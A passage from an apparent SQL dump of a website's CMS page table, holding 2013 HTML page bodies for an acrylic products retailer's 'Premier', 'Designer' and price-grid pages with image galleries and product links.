src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/large/visual 4.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ1\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 6.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 7.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ3\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 17.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ4\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 18.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 19.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTUw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/flush/small/visual 67.jpg\" /></a></p>','','','','','','','','','Y','2013-03-15 07:43:06','2013-02-06 15:03:22',128),(126,'Layout1','1','PREMIER','premiertest2.php','premier test 2','premier test 2','premier test 2','<p align=\"left\"><img width=\"712\" height=\"111\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/large/001.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMx\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMy\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMz\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/007.jpg\" /></a></p>\r\n<p align=\"left\"> </p>','','','','','','','','','Y','2013-03-15 07:40:00','2013-02-07 09:55:51',126),(128,'Layout1','1','PRICE GRIDS: FLUSH','pricegridflush.php','price grid flush','price grid flush','price grid flush','<p><img alt=\"\" width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /></p>\r\n<p> <img width=\"724\" height=\"1300\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new prices flush and premier/NEW FLUSH(1).jpg\" /></p>\r\n<p align=\"left\"> </p>\r\n<p align=\"left\"> </p>\r\n<p align=\"left\"><font color=\"#ff0099\"> </font></p>\r\n<p align=\"left\"><font color=\"#ff0099\"> </font></p>\r\n<p align=\"left\"><font color=\"#ff0099\"><strong>.</strong></font></p>\r\n<p align=\"left\"> </p>\r\n<p align=\"left\"> </p>\r\n<p align=\"left\"> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>','','','','','','','','','Y','2013-04-03 11:58:58','2013-02-07 15:29:34',135),(129,'Layout1','1','PREMIER 1','premier1.php','PREMIER 1','PREMIER 1','PREMIER 1','<br />\r\n<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/large/002.jpg\" /><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMx\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMy\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMz\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/007.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:40:33','2013-02-08 11:10:37',136),(130,'Layout1','1','PREMIER 2','premier2.php','premier 2','premier 2','premier 2','<br />\r\n<br />\r\n<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/large/003.jpg\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMx\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMy\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMz\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/007.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:40:54','2013-02-08 11:26:36',137),(131,'Layout1','1','PREMIER 3','premium3.php','premium 3','premium 3','premium 3','<br />\r\n<br />\r\n<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/large/004.jpg\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMw\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMy\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMz\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/007.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:41:21','2013-02-08 11:48:06',139),(132,'Layout1','1','PREMIER 4','premier4.php','premier 4','premier 4','premier 4','<br />\r\n<br />\r\n<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/large/005.jpg\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMW\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMx\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMz\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/006.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/007.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:41:42','2013-02-08 11:52:22',138),(133,'Layout1','1','PREMIER 5','premier5.php','premier 5','premier 5','premier 5','<br />\r\n<br />\r\n<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/large/006.jpg\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMW\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMx\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMy\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM0\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/007.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:42:04','2013-02-08 12:03:58',140),(134,'Layout1','1','PREMIER 6','premier6.php','premier 6','premier 6','premier 6','<br />\r\n<br />\r\n<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/large/007.jpg\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI2\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/001.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTI5\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/002.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMW\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/003.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMx\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/004.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMy\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/005.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTMz\"><img alt=\"\" width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/premier/small/006.jpg\" /></a></p>','','','','','','','','','N','2013-03-15 07:42:29','2013-02-08 12:11:58',141),(135,'Layout1','1','DESIGNER 7a','designer.php','designer','designer','designer','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/test images/new test images/page banner/acrylic-banner(2).gif\" /><img width=\"726\" height=\"509\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/large/7x5.jpg\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM2\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_71462731.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM3\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_72811603.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM4\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 12.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM5\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 42.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQw\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 55.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQx\"><img width=\"240\" height=\"174\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" /></a></p>','','','','','','','','','N','2013-04-03 20:14:44','2013-02-09 10:07:02',129),(136,'Layout1','1','DESIGNER 2','designer2.php','designer 2','designer 2','designer 2','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/test images/new test images/page banner/acrylic-banner(2).gif\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/large/shutterstock_71462731.jpg\" alt=\"\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM1\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/7x5.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM3\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_72811603.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM4\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 12.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM5\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 42.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQw\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 55.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQx\"><img width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a></p>','','','','','','','','','N','2013-04-03 20:10:23','2013-02-09 10:10:25',143),(137,'Layout1','1','DESIGNER 3','designer3.php','designer 3','designer 3','designer 3','<p align=\"left\"><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/test images/new test images/page banner/acrylic-banner(2).gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/large/shutterstock_72811603.jpg\" alt=\"\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM1\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/7x5.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM2\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_71462731.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM4\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 12.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM5\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 42.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQw\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 55.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQx\"><img width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a></p>','','','','','','','','','N','2013-04-03 20:10:58','2013-02-09 10:19:09',144),(138,'Layout1','1','DESIGNER 4','designer4.php','designer 4','designer 4','designer 4','<p align=\"left\"><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/test images/new test images/page banner/acrylic-banner(2).gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/large/visual 12.jpg\" alt=\"\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM1\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/7x5.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM2\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_71462731.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM3\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_72811603.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM5\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 42.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQw\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 55.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQx\"><img width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a></p>','','','','','','','','','N','2013-04-03 20:11:38','2013-02-09 10:31:23',145),(139,'Layout1','1','DESIGNER 5','designer5.php','designer 5','designer 5','designer 5','<p align=\"left\"><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/test images/new test images/page banner/acrylic-banner(2).gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/large/visual 42.jpg\" alt=\"\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM1\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/7x5.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM2\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_71462731.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM4\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 12.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM3\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_72811603.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQw\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 55.jpg\" alt=\"\" /></a> <img width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></p>','','','','','','','','','N','2013-04-03 20:12:23','2013-02-09 10:36:24',146),(140,'Layout1','1','DESIGNER 6','designer6.php','designer 6','designer 6','designer 6','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/test images/new test images/page banner/acrylic-banner(2).gif\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 55.jpg\" alt=\"\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM1\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/7x5.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM2\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_71462731.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM4\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 12.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM3\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_72811603.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM5\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 42.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQx\"><img width=\"240\" height=\"174\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a></p>','','','','','','','','','N','2013-04-03 20:13:00','2013-02-09 10:42:39',147),(141,'Layout1','1','DESIGNER','designer7.php','designer 7','designer 7','designer 7','<p align=\"left\"><img width=\"726\" height=\"113\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/test images/new test images/page banner/acrylic-banner(2).gif\" /><img width=\"726\" height=\"509\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/large/quad visual.jpg\" /> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM1\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/7x5.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM2\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_71462731.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM4\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 12.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM3\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/shutterstock_72811603.jpg\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTM5\"><img width=\"240\" height=\"168\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 42.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQw\"><img width=\"240\" height=\"168\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/designer/small/visual 55.jpg\" /></a></p>','','','','','','','','','Y','2013-04-03 20:15:05','2013-02-09 10:47:31',130),(143,'Layout1','1','PRICE GRIDS: PREMIER','pricegridpremier.php','price grid premier','price grid premier','price grid premier','<p><img alt=\"\" width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"75\" src=\"http://www.paulgrahamltd.com/EditorImages/image/test images/new test images/new price grids/premier/premier banner.jpg\" /></p>\r\n<p><img width=\"724\" height=\"1300\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new prices flush and premier/premier.jpg\" /></p>\r\n<p align=\"left\"> </p>\r\n<p align=\"left\"><font color=\"#ff0099\"> </font></p>\r\n<p align=\"left\"><font color=\"#ff0099\"> </font></p>\r\n<p align=\"left\"> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>','','','','','','','','','Y','2013-04-03 11:24:43','2013-02-11 10:52:59',133),(144,'Layout1','1','9','aboutultimateacrylics.php','about ultimate acrylics','about ultimate acrylics','about ultimate acrylics','<p><img alt=\"\" width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" /><img alt=\"\" width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/003.jpg\" /> </p>\r\n<br />\r\n<p><a 